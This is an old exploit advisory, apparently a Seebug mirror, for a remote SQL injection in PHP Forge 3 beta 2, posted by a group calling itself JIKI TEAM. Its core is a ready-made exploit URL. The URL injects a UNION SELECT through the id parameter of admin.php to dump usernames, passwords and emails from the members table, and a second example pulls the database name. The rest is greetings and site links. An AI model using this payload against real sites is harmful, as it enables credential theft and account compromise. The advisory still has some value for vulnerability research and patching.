PHP Forge <= 3 beta 2 (id) Remote SQL Injection Vulnerability

2008-04-28T00:00:00
ID SSV:8378
Type seebug
Reporter Root
Modified 2008-04-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                =========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-back.org
# Script  : Forge 3.0 b锚ta
# Bug   : Remote SQL Injection Vulnerability
# Download  : http://membres.lycos.fr/phpforge/downloads/phpforge3b2.tar.gz
=========================JIkI Team===================
# Exploit  :
 http://[Site]/[script]/http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
# Ex :
http://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1  union  select  0,1,database(),3,4,5,6,7  from  membres--
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com 
=========================================================

# sebug.net